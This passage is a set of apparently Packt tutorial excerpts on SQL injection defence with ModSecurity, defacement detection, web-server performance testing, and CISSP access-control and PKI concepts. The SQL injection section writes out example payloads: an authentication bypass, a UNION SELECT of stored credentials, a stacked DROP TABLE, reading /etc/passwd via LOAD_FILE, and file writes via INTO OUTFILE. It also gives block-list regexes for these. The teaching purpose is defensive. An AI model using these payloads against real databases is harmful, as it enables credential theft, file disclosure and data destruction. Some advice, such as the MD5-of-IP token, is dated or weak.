This query will return all users in the results table, since the OR '1'='1' part at the end of the statement will make the entire statement true no matter what username and password is provided.

Standard injection attempts

Let's take a look at some of the most common ways SQL injection attacks are performed.

Retrieving data from multiple tables with UNION

An SQL UNION statement can be used to retrieve data from two separate tables.
If there is one table named cooking_recipes and another table named user_credentials, then the following SQL statement will retrieve data from both tables:

SELECT dish_name, author FROM cooking_recipes
UNION
SELECT username, password FROM user_credentials;

It's easy to see how the UNION statement can allow an attacker to retrieve data from other tables in the database if he manages to sneak it into a query. A similar SQL statement is UNION ALL, which works almost the same way as UNION - the only difference is that UNION ALL will not eliminate any duplicate rows returned in the result.

Multiple queries in one call

If the SQL engine allows multiple statements in a single SQL query, then seemingly harmless statements such as the following can present a problem:

SELECT * FROM products WHERE id = %d;

If an attacker is able to provide an ID parameter of 1; DROP TABLE products;, then the statement suddenly becomes:

SELECT * FROM products WHERE id = 1; DROP TABLE products;

When the SQL engine executes this, it will first perform the expected SELECT query, and then the DROP TABLE products statement, which will cause the products table to be deleted.

Reading arbitrary files

MySQL can be used to read data from arbitrary files on the system. This is done by using the LOAD_FILE() function:

SELECT LOAD_FILE("/etc/passwd");

This command returns the contents of the file /etc/passwd. This works for any file to which the MySQL process has read access.

Writing data to files

MySQL also supports the command INTO OUTFILE, which can be used to write data into files. This attack illustrates how dangerous it can be to include user-supplied data in SQL commands, since with the proper syntax, an SQL command can not only affect the database, but also the underlying file system.
This simple example shows how to use MySQL to write the string some data into the file test.txt:

mysql> SELECT "some data" INTO OUTFILE "test.txt";

Preventing SQL injection attacks

There are three important steps you need to take to prevent SQL injection attacks:

1. Use SQL prepared statements.
2. Sanitize user data.
3. Use ModSecurity to block SQL injection code supplied to web applications.

These are in order of importance, so the most important consideration should always be to make sure that any code querying SQL databases that relies on user input uses prepared statements. A prepared statement looks as follows:

SELECT * FROM books WHERE isbn = ? AND num_copies < ?;

This allows the SQL engine to replace the question marks with the actual data. Since the SQL engine knows exactly what is data and what is SQL syntax, this prevents SQL injection from taking place. The advantages of using prepared statements are twofold: they effectively prevent SQL injection, and they speed up execution time, since the SQL engine can compile the statement once and use the pre-compiled statement on all subsequent query invocations. So not only will using prepared statements make your code more secure - it will also make it quicker.

The second step is to make sure that any user data used in SQL queries is sanitized. Any unsafe characters, such as single quotes, should be escaped. If you are using PHP, the function mysql_real_escape_string() will do this for you.

Finally, let's take a look at strings that ModSecurity can help block to prevent SQL injection attacks.

What to block

The following table lists common SQL commands that you should consider blocking, together with a suggested regular expression for each. The regular expressions are in lowercase and therefore assume that the t:lowercase transformation function is used.
SQL code              Regular expression
UNION SELECT          union\s+select
UNION ALL SELECT      union\s+all\s+select
INTO OUTFILE          into\s+outfile
DROP TABLE            drop\s+table
ALTER TABLE           alter\s+table
LOAD_FILE             load_file
SELECT *              select\s+\*

For example, a rule to detect attempts to write data into files using INTO OUTFILE looks as follows:

SecRule ARGS "into\s+outfile" "t:lowercase,deny,msg:'SQL Injection'"

The \s+ regular expression syntax allows for detection of an arbitrary number of whitespace characters. This will detect evasion attempts such as INTO%20%20OUTFILE, where multiple spaces are used between the SQL command words.

Website defacement

We've all seen the news stories: "Large Company X was yesterday hacked and their homepage was replaced with an obscene message". This sort of thing is an everyday occurrence on the Internet. After the company SCO initiated a lawsuit against Linux vendors citing copyright violations in the Linux source code, the SCO corporate website was hacked and an image was altered to read WE OWN ALL YOUR CODE - pay us all your money. The hack was subtle enough that the casual visitor to the SCO site would likely not be able to tell that this was not the official version of the homepage. The above image shows what the SCO homepage looked like after being defaced - quite subtle, don't you think?

Preventing website defacement is important for a business for several reasons:

- Potential customers will turn away when they see the hacked site
- There will be an obvious loss of revenue if the site is used for any sort of e-commerce sales
- Bad publicity will tarnish the company's reputation

Defacement of a site will of course depend on a vulnerability being successfully exploited. The measures we will look at here are aimed at detecting that a defacement has taken place, so that the real site can be restored as quickly as possible. Detection of website defacement is usually done by looking for a specific token in the outgoing web pages.
This token has been placed within the pages in advance specifically so that it may be used to detect defacement - if the token isn't there, then the site has likely been defaced. This can be sufficient, but it can also allow the attacker to insert the same token into his defaced page, defeating the detection mechanism. Therefore, we will go one better and create a defacement detection technique that will be difficult for the hacker to get around.

To create a dynamic token, we will be using the visitor's IP address. The reason we use the IP address instead of the hostname is that a reverse lookup may not always be possible, whereas the IP address will always be available. The following example code in JSP illustrates how the token is calculated and inserted into the page:

<%@ page import="java.security.*" %>
<%
  String tokenPlaintext = request.getRemoteAddr();
  String tokenHashed = "";
  String hexByte = "";
  // Hash the IP address
  MessageDigest md5 = MessageDigest.getInstance("MD5");
  md5.update(tokenPlaintext.getBytes());
  byte[] digest = md5.digest();
  for (int i = 0; i < digest.length; i++) {
    hexByte = Integer.toHexString(0xFF & digest[i]);
    if (hexByte.length() < 2) {
      hexByte = "0" + hexByte;
    }
    tokenHashed += hexByte;
  }
  // Write MD5 sum token to HTML document
  out.println(String.format("<span style='color: white'>%s</span>", tokenHashed));
%>

Assuming the background of the page is white, the <span style='color: white'> markup will ensure the token is not visible to website viewers.

Now for the ModSecurity rules to handle the defacement detection. We need to look at outgoing pages and make sure that they include the appropriate token. Since the token will be different for different users, we need to calculate the same MD5 sum token in our ModSecurity rule and make sure that this token is included in the output. If not, we block the page from being sent and sound the alert by sending an email message to the website administrator.
#
# Detect and block outgoing pages not containing our token
#
SecRule REMOTE_ADDR ".*" "phase:4,deny,chain,t:md5,t:hexEncode,exec:/usr/bin/emailadmin.sh"
SecRule RESPONSE_BODY "!@contains %{MATCHED_VAR}"

We are placing the rule in phase 4, since this is required when we want to inspect the response body. The exec action is used to send an email to the website administrator to let him know of the website defacement.
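For reference, the token produced by both the JSP snippet and the t:md5,t:hexEncode transformation chain is simply the hex-encoded MD5 of the client IP address, which is easy to reproduce when debugging the rule. A Python equivalent (the function name is my own):

```python
import hashlib

def defacement_token(remote_addr: str) -> str:
    """Hex-encoded MD5 of the visitor's IP address."""
    return hashlib.md5(remote_addr.encode("ascii")).hexdigest()
```

The result is 32 lowercase hex characters, matching the lowercase output of Integer.toHexString in the JSP code.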
Packt
30 Nov 2009
13 min read

Ways to improve performance of your server in ModSecurity 2.5

A typical HTTP request

To get a better picture of the possible delay incurred when using a web application firewall, it helps to understand the anatomy of a typical HTTP request, and what processing time a typical web page download will incur. This will help us compare any added ModSecurity processing time to the overall time for the entire request.

When a user visits a web page, his browser first connects to the server and downloads the main resource requested by the user (for example, an .html file). It then parses the downloaded file to discover any additional files, such as images or scripts, that it must download to be able to render the page. Therefore, from the point of view of a web browser, the following sequence of events happens for each file:

1. Connect to the web server.
2. Request the required file.
3. Wait for the server to start serving the file.
4. Download the file.

Each of these steps adds latency, or delay, to the request. A typical download time for a web page is on the order of hundreds of milliseconds per file for a home cable/DSL user. This can be slower or faster, depending on the speed of the connection and the geographical distance between the client and the server.

If ModSecurity adds any delay to the page request, it will be to the server processing time, or in other words, the time from when the client has connected to the server to when the last byte of content has been sent out to the client.

Another aspect that needs to be kept in mind is that ModSecurity will increase the memory usage of Apache. In what is probably the most common Apache configuration, known as "prefork", Apache starts one new child process for each active connection to the server.
This means that the number of Apache instances increases and decreases depending on the number of client connections to the server. As the total memory usage of Apache depends on the number of child processes running and the memory usage of each child process, we should look at the way ModSecurity affects the memory usage of Apache.

A real-world performance test

In this section we will run a performance test on a real web server running Apache 2.2.8 on a Fedora Linux server (kernel 2.6.25). The server has an Intel Xeon 2.33 GHz dual-core processor and 2 GB of RAM. We will start out by benchmarking the server when it is running just Apache, without ModSecurity enabled. We will then run our tests with ModSecurity enabled but without any rules loaded. Finally, we will test ModSecurity with a ruleset loaded so that we can draw conclusions about how the performance is affected. The rules we will be using come supplied with ModSecurity and are called the "core ruleset".

The core ruleset

The ModSecurity core ruleset contains over 120 rules and is shipped with the default ModSecurity source distribution (it's contained in the rules sub-directory). This ruleset is designed to provide "out of the box" protection against some of the most common web attacks used today. Here are some of the things that the core ruleset protects against:

- Suspicious HTTP requests (for example, missing User-Agent or Accept headers)
- SQL injection
- Cross-Site Scripting (XSS)
- Remote code injection
- File disclosure

We will examine these methods of attack, but for now, let's use the core ruleset and examine how enabling it impacts the performance of your web service.

Installing the core ruleset

To install the core ruleset, create a new sub-directory named modsec under your Apache conf directory (the location will vary depending on your distribution).
Then copy all the .conf files from the rules sub-directory of the source distribution to the new modsec directory:

mkdir /etc/httpd/conf/modsec
cp /home/download/modsecurity-apache/rules/modsecurity_crs_*.conf /etc/httpd/conf/modsec

Finally, enter the following line in your httpd.conf file and restart Apache to make it read the new rule files:

# Enable ModSecurity core ruleset
Include conf/modsec/*.conf

Putting the core rules in a separate directory makes it easy to disable them - all you have to do is comment out the above Include line in httpd.conf and restart Apache, and the rules will be disabled.

Making sure it works

The core ruleset contains a file named modsecurity_crs_10_config.conf. This file contains some of the basic configuration directives needed to turn on the rule engine and configure request and response body access. Since we have already configured these directives, we do not want this file to conflict with our existing configuration, and so we need to disable it. To do this, we simply rename the file so that it has a different extension, as Apache only loads *.conf files with the Include directive we used above:

$ mv modsecurity_crs_10_config.conf modsecurity_crs_10_config.conf.disabled

Once we have restarted Apache, we can test that the core ruleset is loaded by attempting to access a URL that it should block. For example, try surfing to http://yourserver/ftp.exe and you should get the error message Method Not Implemented, ensuring that the core rules are loaded.

Performance testing basics

So what effect does loading the core ruleset have on web application response time, and how do we measure this? We could measure the response time for a single request with and without the core ruleset loaded, but this wouldn't have any statistical significance - it could happen that just as one of the requests was being processed, the server started to execute a processor-intensive scheduled task, causing a delayed response time.
The best way to compare the response times is to issue a large number of requests and look at the average time it takes for the server to respond. An excellent tool - and the one we are going to use to benchmark the server in the following tests - is called httperf. Written by David Mosberger of Hewlett-Packard Research Labs, httperf allows you to simulate high workloads against a web server and obtain statistical data on the performance of the server. You can obtain the program at http://www.hpl.hp.com/research/linux/httperf/ where you'll also find a useful manual page in PDF format and a link to the research paper published together with the first version of the tool.

Using httperf

We'll run httperf with the options --hog (use as many TCP ports as needed), --uri /index.html (request the static web page index.html), and --num-conn 1000 (initiate a total of 1000 connections). We will be varying the number of requests per second (specified using --rate) to see how the server responds under different workloads.
This is what the typical output from httperf looks like when run with the above options:

$ ./httperf --hog --server=bytelayer.com --uri /index.html --num-conn 1000 --rate 50
Total: connections 1000 requests 1000 replies 1000 test-duration 20.386 s
Connection rate: 49.1 conn/s (20.4 ms/conn, <=30 concurrent connections)
Connection time [ms]: min 404.1 avg 408.2 max 591.3 median 404.5 stddev 16.9
Connection time [ms]: connect 102.3
Connection length [replies/conn]: 1.000
Request rate: 49.1 req/s (20.4 ms/req)
Request size [B]: 95.0
Reply rate [replies/s]: min 46.0 avg 49.0 max 50.0 stddev 2.0 (4 samples)
Reply time [ms]: response 103.1 transfer 202.9
Reply size [B]: header 244.0 content 19531.0 footer 0.0 (total 19775.0)
Reply status: 1xx=0 2xx=1000 3xx=0 4xx=0 5xx=0
CPU time [s]: user 2.37 system 17.14 (user 11.6% system 84.1% total 95.7%)
Net I/O: 951.9 KB/s (7.8*10^6 bps)
Errors: total 0 client-timo 0 socket-timo 0 connrefused 0 connreset 0
Errors: fd-unavail 0 addrunavail 0 ftab-full 0 other 0

The output shows us the number of TCP connections httperf initiated per second ("Connection rate"), the rate at which it requested files from the server ("Request rate"), and the actual reply rate that the server was able to provide ("Reply rate"). We also get statistics on the reply time - the "Reply time - response" figure is the time taken from when the first byte of the request was sent to the server to when the first byte of the reply was received - in this case around 103 milliseconds. The transfer time is the time to receive the entire response from the server.

The page we will be requesting in this case, index.html, is 20 KB in size, which is a pretty average size for an HTML document. httperf requests the page once per connection and doesn't follow any links in the page to download additional embedded content or script files, so the number of such links in the page is of no relevance to our test.
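When collecting results from many httperf runs, it helps to pull out the interesting figures automatically. The following small parser is my own, hypothetical helper for the reply-time line shown above:

```python
import re

def reply_time_ms(httperf_output: str):
    """Extract (response, transfer) times in ms from httperf's report."""
    m = re.search(
        r"Reply time \[ms\]: response ([\d.]+) transfer ([\d.]+)",
        httperf_output,
    )
    return (float(m.group(1)), float(m.group(2))) if m else None
```

Feeding it the sample output above yields (103.1, 202.9); collecting these tuples across runs makes it easy to chart response time against request rate.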
Getting a baseline: Testing without ModSecurity

When running benchmarking tests like this one, it's always important to get a baseline result so that you know the performance of your server when the component you're measuring is not involved. In our case, we will run the tests against the server when ModSecurity is disabled. This will allow us to tell what impact, if any, running with ModSecurity enabled has on the server.

Response time

The following chart shows the response time, in milliseconds, of the server when it is running without ModSecurity. The number of requests per second is on the horizontal axis.

As we can see, the server consistently delivers response times of around 300 milliseconds until we reach about 75 requests per second. Above this, the response time starts increasing, and at around 500 requests per second the response time is almost a second per request. This data is what we will use for comparison purposes when looking at the response time of the server after we enable ModSecurity.

Memory usage

Finding the memory usage on a Linux system can be quite tricky. Simply running the Linux top utility and looking at the amount of free memory doesn't quite cut it, and the reason is that Linux tries to use almost all free memory as a disk cache. So even on a system with several gigabytes of memory and no memory-hungry processes, you might see a free memory count of only 50 MB or so.

Another problem is that Apache uses many child processes, and to accurately measure the memory usage of Apache we need to sum the memory usage of each child process. What we need is a way to measure the memory usage of all the Apache child processes so that we can see how much memory the web server truly uses. To solve this, here is a small shell script that I have written that runs the ps command to find all the Apache processes.
It then passes the PID of each Apache process to pmap to find the memory usage, and finally uses awk to extract the memory usage (in KB) for summation. The result is that the memory usage of Apache is printed to the terminal. The actual shell command is only one long line, but I've put it into a file called apache_mem.sh to make it easier to use:

#!/bin/sh
# apache_mem.sh
# Calculate the Apache memory usage
ps -ef | grep httpd | grep ^apache | awk '{ print $2 }' | xargs pmap -x | grep 'total kB' | awk '{ print $3 }' | awk '{ sum += $1 } END { print sum }'

Now, let's use this script to look at the memory usage of all of the Apache processes while we are running our performance test. The following graph shows the memory usage of Apache as the number of requests per second increases.

Apache starts out consuming about 300 MB of memory. Memory usage grows steadily, and at about 150 requests per second it starts climbing more rapidly. At 500 requests per second, the memory usage is over 2.4 GB - more than the amount of physical RAM of the server. The fact that this is possible is because of the virtual memory architecture that Linux (and all modern operating systems) use. When there is no more physical RAM available, the kernel starts swapping memory pages out to disk, which allows it to continue operating. However, since reading from and writing to a hard drive is much slower than doing the same to memory, this starts slowing down the server significantly, as evidenced by the increase in response time seen in the previous graph.

CPU usage

In both of the tests above, the server's CPU usage was consistently around 1 to 2%, no matter what the request rate was. You might have expected a graph of CPU usage in the previous and subsequent tests, but while I measured the CPU usage in each test, it turned out to run at this low utilization rate for all tests, so a graph would not be very useful. Suffice it to say that in these tests, CPU usage was not a factor.
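As an aside, the same total can be obtained without ps and pmap by reading /proc directly. The Python sketch below is a rough, hypothetical equivalent of apache_mem.sh; it assumes the Apache processes are named httpd, and note that summing VmRSS counts pages shared between child processes once per process, so it can overstate the true footprint:

```python
import os

def vmrss_kb(status_text: str) -> int:
    """Parse the VmRSS line of a /proc/<pid>/status file (value in kB)."""
    for line in status_text.splitlines():
        if line.startswith("VmRSS:"):
            return int(line.split()[1])
    return 0

def apache_memory_kb(name: str = "httpd") -> int:
    """Sum resident memory over all processes whose comm matches name."""
    total = 0
    for pid in os.listdir("/proc"):
        if not pid.isdigit():
            continue
        try:
            with open(f"/proc/{pid}/comm") as f:
                if f.read().strip() != name:
                    continue
            with open(f"/proc/{pid}/status") as f:
                total += vmrss_kb(f.read())
        except OSError:
            continue  # process exited while we were scanning
    return total
```

This is Linux-only, like the shell script, since it depends on the /proc filesystem.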
ModSecurity without any loaded rules

Now, let's enable ModSecurity, but without loading any rules, and see what happens to the response time and memory usage. Both SecRequestBodyAccess and SecResponseBodyAccess were set to On, so if there is any performance penalty associated with buffering requests and responses, we should see it now that we are running ModSecurity without any rules.

The following graph shows the response time of Apache with ModSecurity enabled.

We can see that the response time graph looks very similar to the one we got when ModSecurity was disabled. The response time starts increasing at around 75 requests per second, and once we pass 350 requests per second, things really start going downhill.

The memory usage graph is also almost identical to the previous one. Apache uses around 1.3 MB of extra memory per child process when ModSecurity is loaded, which equals a total memory usage increase of 26 MB for this particular setup. Compared to the total amount of memory Apache uses when the server is idle (around 300 MB), this is an increase of about 10%.

ModSecurity with the core ruleset loaded

Now for the really interesting test: we'll run httperf against ModSecurity with the core ruleset loaded and look at what that does to the response time and memory usage.

Response time

The following graph shows the server response time with the core ruleset loaded.

At first, the response time is around 340 ms, which is about 35 ms slower than in the previous tests. Once the request rate gets above 50, the server response time starts deteriorating. As the request rate grows, the response time gets worse and worse, reaching a full 5 seconds at 100 requests per second. I have capped the graph at 100 requests per second, as the server performance has already deteriorated enough at this point to allow us to see the trend.
We see that the point at which the response time starts increasing has gone down from 75 to 50 requests per second now that we have enabled the core ruleset. This equals a 33% reduction in the maximum number of requests per second the server can handle.
Packt
27 Nov 2009
4 min read
CISSP: Security Measures for Access Control

Knowledge requirements

A candidate appearing for the CISSP exam should have knowledge in the following areas that relate to access control:

- Control access by applying concepts, methodologies, and techniques
- Identify, evaluate, and respond to access control attacks such as brute force attacks, dictionary attacks, spoofing, denial of service, and so on
- Design, coordinate, and evaluate penetration test(s)
- Design, coordinate, and evaluate vulnerability test(s)

The approach

In accordance with the knowledge expected in the CISSP exam, this domain is broadly grouped under five sections, as shown in the following diagram:

Section 1: The Access Control domain consists of many concepts, methodologies, and some specific techniques that are used as best practices. This section covers some of the basic concepts, access control models, and a few examples of access control techniques.

Section 2: Authentication processes are critical for controlling access to facilities and systems. This section looks into important concepts that establish the relationship between access control mechanisms and authentication processes.

Section 3: A system or facility becomes compromised primarily through unauthorized access, either through the front door or the back door. We'll see some of the common and popular attacks on access control mechanisms, and also learn about the prevalent countermeasures to such attacks.

Section 4: An IT system consists of operating system software, applications, and embedded software in devices, to name a few. Vulnerabilities in such software are nothing but holes or errors. In this section we see some of the common vulnerabilities in IT systems, vulnerability assessment techniques, and vulnerability management principles.

Section 5: Vulnerabilities are exploitable, in the sense that IT systems can be compromised and unauthorized access can be gained by exploiting the vulnerabilities.
Penetration testing, or ethical hacking, is an activity that tests the exploitability of vulnerabilities to gain unauthorized access to an IT system.

Today, we'll quickly review some of the important concepts in Sections 1, 2, and 3.

Access control concepts, methodologies, and techniques

Controlling access to information systems and information processing facilities by means of administrative, physical, and technical safeguards is the primary goal of the access control domain. The following topics provide insight into some of the important access control related concepts, methodologies, and techniques.

Basic concepts

One of the primary concepts in access control is to understand the subject and the object. A subject may be a person, a process, or a technology component that either seeks access or controls the access. For example, an employee trying to access his business email account is a subject. Similarly, the system that verifies the credentials, such as username and password, is also termed a subject.

An object can be a file, data, physical equipment, or premises which need controlled access. For example, the email stored in the mailbox is an object that a subject is trying to access.

Controlling access to an object by a subject is the core requirement of an access control process and its associated mechanisms. In a nutshell, a subject either seeks or controls access to an object.

An access control mechanism can be classified broadly into the following two types:

If access to an object is controlled based on certain contextual parameters, such as location, time, sequence of responses, access history, and so on, then it is known as context-dependent access control. In this type of control, the value of the asset being accessed is not a primary consideration.
Providing the username and password combination followed by a challenge-and-response mechanism such as CAPTCHA, filtering access based on MAC addresses in wireless connections, or a firewall filtering data based on packet analysis are all examples of context-dependent access control mechanisms.

Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) is a challenge-response test to ensure that the input to an access control system is supplied by humans and not by machines. This mechanism is predominantly used by web sites to prevent Web Robots (WebBots) from accessing the controlled sections of a web site by brute force methods. The following is an example of CAPTCHA:

If access is provided based on the attributes or content of an object, then it is known as content-dependent access control. In this type of control, the value and attributes of the content being accessed determine the control requirements. For example, hiding or showing menus in an application, views in databases, and access to confidential information are all content-dependent.
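The distinction between the two mechanism types can be made concrete with a toy sketch. This is illustrative only: the function names, the "corporate-lan" network label, and the record attributes are all invented for the example, and a real system would consult policy stores rather than hard-coded rules.

```python
from datetime import time

# Context-dependent: the decision looks at HOW and WHEN access is
# requested (time of day, source network), not at the asset's value.
def context_allows(request_time, source_network):
    business_hours = time(9, 0) <= request_time <= time(17, 0)
    trusted_net = source_network == "corporate-lan"
    return business_hours and trusted_net

# Content-dependent: the decision looks at WHAT is being accessed --
# here, the classification attribute of the record itself.
def content_allows(record, requester_role):
    if record["classification"] == "confidential":
        return requester_role == "manager"
    return True

# A daytime request from the trusted network passes the context check...
assert context_allows(time(10, 30), "corporate-lan")
# ...but a clerk still cannot read a confidential record.
assert not content_allows({"classification": "confidential"}, "clerk")
```

The same request can therefore pass one check and fail the other, which is exactly why the two types are taught as distinct controls.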
Packt
28 Oct 2009
10 min read
Public Key Infrastructure (PKI) and other Concepts in Cryptography for CISSP Exam

Public key infrastructure

Public Key Infrastructure (PKI) is a framework that enables the integration of various services that are related to cryptography. The aim of PKI is to provide confidentiality, integrity, access control, authentication, and most importantly, non-repudiation.

Non-repudiation is a concept, or a way, to ensure that the sender or receiver of a message cannot deny either sending or receiving such a message in the future. One of the important audit checks for non-repudiation is a time stamp. The time stamp is an audit trail that provides information on the time the message was sent by the sender and the time it was received by the receiver.

Encryption and decryption, digital signatures, and key exchange are the three primary functions of a PKI. RSA and elliptic curve algorithms provide all three primary functions: encryption and decryption, digital signatures, and key exchange. The Diffie-Hellman algorithm supports key exchange, while the Digital Signature Standard (DSS) is used for digital signatures.

Public key encryption is the encryption methodology used in PKI and was initially proposed by Diffie and Hellman in 1976. The algorithm is based on mathematical functions and uses asymmetric cryptography, that is, a pair of keys. The image above represents a simple document-signing function.

In PKI, every user has two keys known as a "pair of keys". One key is known as the private key and the other as the public key. The private key is never revealed and is kept with the owner; the public key is accessible by everyone and is stored in a key repository. A key can be used to encrypt as well as to decrypt a message. Most importantly, a message that is encrypted with a private key can only be decrypted with the corresponding public key. Similarly, a message that is encrypted with a public key can only be decrypted with the corresponding private key.
In the example image above, Bob wants to send a confidential document to Alice electronically. Bob has four issues to address before this electronic transmission can occur:

- Ensuring the contents of the document are encrypted such that the document is kept confidential.
- Ensuring the document is not altered during transmission.
- Since Alice does not know Bob, he has to somehow prove that the document is indeed sent by him.
- Ensuring Alice receives the document and that she cannot deny receiving it in the future.

PKI supports all four of the above requirements with methods such as secure messaging, message digests, digital signatures, and non-repudiation services.

Secure messaging

To ensure that the document is protected from eavesdropping and not altered during transmission, Bob will first encrypt the document using Alice's public key. This ensures two things: one, that the document is encrypted, and two, that only Alice can open it, as doing so requires Alice's private key. To summarize, encryption is accomplished using the public key of the receiver, and the receiver decrypts with his or her private key. With this method, Bob can ensure that the document is encrypted and that only the intended receiver (Alice) can open it. However, Bob cannot ensure whether the contents are altered (integrity) during transmission by document encryption alone.

Message digest

In order to ensure that the document is not altered during transmission, Bob performs a hash function on the document. The hash value is a computational value based on the contents of the document, and is known as the message digest. By performing the same hash function on the decrypted document, Alice can obtain the message digest and compare it with the one sent by Bob to ensure that the contents were not altered. This process ensures the integrity requirement.
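The digest comparison Bob and Alice perform can be sketched with Python's standard hashlib module. SHA-256 is used here as a modern stand-in (the surrounding text's examples involve MD5); the document bytes are invented for illustration.

```python
import hashlib

document = b"Quarterly results: revenue up 12%"

# Bob computes the message digest before sending the document...
digest_sent = hashlib.sha256(document).hexdigest()

# ...and Alice recomputes it on what she received and compares.
digest_received = hashlib.sha256(document).hexdigest()
assert digest_received == digest_sent  # contents unaltered

# A single changed character produces a completely different digest,
# which is how tampering in transit is detected.
tampered = b"Quarterly results: revenue up 13%"
assert hashlib.sha256(tampered).hexdigest() != digest_sent
```

Note that a digest alone proves integrity, not origin: anyone can recompute a hash, which is why the next step binds the digest to Bob with his private key.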
Digital signature

In order to prove that the document was sent by Bob to Alice, Bob needs to use a digital signature. Using a digital signature means applying the sender's private key to the message, the document, or the message digest. This process is known as signing. The message can then be decrypted only by using the sender's public key.

Bob will encrypt the message digest with his private key to create a digital signature. In the scenario illustrated in the image above, Bob will encrypt the document using Alice's public key and sign it using his digital signature. This ensures that Alice can verify that the document was sent by Bob, by verifying the digital signature (created with Bob's private key) using Bob's public key. Remember, a private key and the corresponding public key are linked, albeit mathematically. Alice can also verify that the document was not altered by validating the message digest, and can open the encrypted document using her private key.

Message authentication is an authenticity verification procedure that facilitates the verification of the integrity of the message as well as the authenticity of the source from which the message is received.

Digital certificate

By digitally signing the document, Bob has assured Alice that the document was sent by him. However, he has not yet proved that he is Bob. To prove this, Bob needs to use a digital certificate. A digital certificate is an electronic identity issued to a person, system, or organization by a competent authority after verifying the credentials of the entity. A digital certificate is a public key that is unique for each entity. A certification authority issues digital certificates.

In PKI, digital certificates are used for authenticity verification of an entity. An entity can be an individual, a system, or an organization. An organization that is involved in issuing, distributing, and revoking digital certificates is known as a Certification Authority (CA).
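The sign-with-private-key, verify-with-public-key relationship described above can be sketched with textbook RSA. This is a toy: the primes are deliberately tiny classroom values, the digest is a stand-in integer, and real PKI uses 2048-bit keys with padding schemes, never raw exponentiation like this.

```python
# Toy RSA key pair with tiny primes (illustration only, not secure).
p, q = 61, 53
n = p * q        # 3233, the modulus shared by both keys
e = 17           # public exponent
d = 2753         # private exponent: (e * d) % lcm(p-1, q-1) == 1

digest = 1234    # stand-in for a message digest, as an integer < n

# Bob "signs" by applying his private key to the digest...
signature = pow(digest, d, n)

# ...and anyone holding Bob's public key (e, n) can verify: applying
# the public exponent to the signature recovers the original digest.
assert pow(signature, e, n) == digest

# A forged signature fails verification.
assert pow(signature + 1, e, n) != digest
```

Because only Bob knows d, a signature that verifies under (e, n) could only have been produced by him, which is exactly the non-repudiation property the text describes.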
A CA acts as a notary by verifying an entity's identity. One of the important PKI standards pertaining to digital certificates is X.509, a standard published by the International Telecommunication Union (ITU) that specifies the standard format for digital certificates. PKI also provides key exchange functionality that facilitates the secure exchange of public keys such that the authenticity of the parties can be verified.

Key management procedures

Key management consists of four essential procedures concerning public and private keys. They are as follows:

- Secure generation of keys: ensures that private and public keys are generated in a secure manner.
- Secure storage of keys: ensures that keys are stored securely.
- Secure distribution of keys: ensures that keys are not lost or modified during distribution.
- Secure destruction of keys: ensures that keys are destroyed completely once the useful life of the key is over.

Types of keys

NIST Special Publication 800-57, titled Recommendation for Key Management - Part 1: General, specifies the following nineteen types of keys:

- Private signature key: the private key of a public key pair, used to generate digital signatures. It is also used to provide authentication, integrity, and non-repudiation.
- Public signature verification key: the public key of the asymmetric (public) key pair, used to verify the digital signature.
- Symmetric authentication key: used with symmetric key algorithms to provide assurance of the integrity and source of messages.
- Private authentication key: the private key of the asymmetric (public) key pair, used to provide assurance of the integrity of information.
- Public authentication key: the public key of an asymmetric (public) key pair, used to determine the integrity of information and to authenticate the identity of entities.
- Symmetric data encryption key: used to apply confidentiality protection to information.
- Symmetric key wrapping key: a key-encrypting key that is used to encrypt other symmetric keys.
- Symmetric and asymmetric random number generation keys: used to generate random numbers.
- Symmetric master key: a master key that is used to derive other symmetric keys.
- Private key transport key: the private key of an asymmetric (public) key pair, used to decrypt keys that have been encrypted with the associated public key.
- Public key transport key: the public key of an asymmetric (public) key pair, used to encrypt keys that can then be decrypted only with the associated private key.
- Symmetric agreement key: used to establish keys such as key wrapping keys and data encryption keys using a symmetric key agreement algorithm.
- Private static key agreement key: a private key of an asymmetric (public) key pair that is used to establish keys such as key wrapping keys and data encryption keys.
- Public static key agreement key: a public key of an asymmetric (public) key pair that is used to establish keys such as key wrapping keys and data encryption keys.
- Private ephemeral key agreement key: a private key of an asymmetric (public) key pair used only once to establish one or more keys such as key wrapping keys and data encryption keys.
- Public ephemeral key agreement key: a public key of an asymmetric (public) key pair that is used in a single key establishment transaction to establish one or more keys.
- Symmetric authorization key: used to provide privileges to an entity using symmetric cryptographic methods.
- Private authorization key: the private key of an asymmetric (public) key pair that is used to provide privileges to an entity.
- Public authorization key: the public key of an asymmetric (public) key pair that is used to verify privileges for an entity that knows the associated private authorization key.
Key management best practices

Key usage refers to using a key for a cryptographic process, and should be limited to a single key for only one cryptographic process. This ensures that the strength of the security provided by the key is not weakened.

When a specific key is authorized for use by legitimate entities for a period of time, or the effect of a specific key on a given system lasts for a specific period, that time span is known as a cryptoperiod. The purpose of defining a cryptoperiod is to limit successful cryptanalysis by a malicious entity. Cryptanalysis is the science of analyzing and deciphering codes and ciphers.

The following assurance requirements are part of the key management process:

- Integrity protection: assuring the source and format of the keying material by verification
- Domain parameter validity: assuring the parameters used by some public key algorithms during the generation of key pairs and digital signatures, and during the generation of shared secrets that are subsequently used to derive keying material
- Public key validity: assuring that the public key is arithmetically correct
- Private key possession: assuring that possession of the private key is established before the public key is used

Cryptographic algorithm and key size selection are the two important key management parameters that provide adequate protection to the system and the data throughout their expected lifetime.

Key states

A cryptographic key goes through different states from its generation to destruction. These states are defined as key states. The movement of a cryptographic key from one state to another is known as a key transition.
NIST SP 800-57 defines the following six key states:

- Pre-activation state: the key has been generated, but not yet authorized for use
- Active state: the key may be used to cryptographically protect information
- Deactivated state: the cryptoperiod of the key has expired, but the key is still needed to perform cryptographic operations
- Destroyed state: the key has been destroyed
- Compromised state: the key has been released to or determined by an unauthorized entity
- Destroyed compromised state: the key was destroyed after a compromise, or the compromise was discovered after the key was destroyed
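The six states and the transitions between them can be modeled as a small state machine. The transition table below is an illustrative subset chosen for the sketch, not the normative SP 800-57 diagram, and the function names are invented.

```python
# Key states from NIST SP 800-57; the allowed transitions shown here
# are an illustrative subset, not the full normative transition model.
TRANSITIONS = {
    "pre-activation": {"active", "destroyed"},
    "active": {"deactivated", "compromised"},
    "deactivated": {"destroyed", "compromised"},
    "compromised": {"destroyed-compromised"},
    "destroyed": {"destroyed-compromised"},
    # "destroyed-compromised" is terminal: no outgoing transitions.
}

def transition(current, new):
    """Return the new state, or raise if the key transition is illegal."""
    if new not in TRANSITIONS.get(current, set()):
        raise ValueError(f"illegal key transition: {current} -> {new}")
    return new

# A normal key lifecycle: generated, authorized, expired, destroyed.
state = "pre-activation"
state = transition(state, "active")
state = transition(state, "deactivated")
state = transition(state, "destroyed")
assert state == "destroyed"
```

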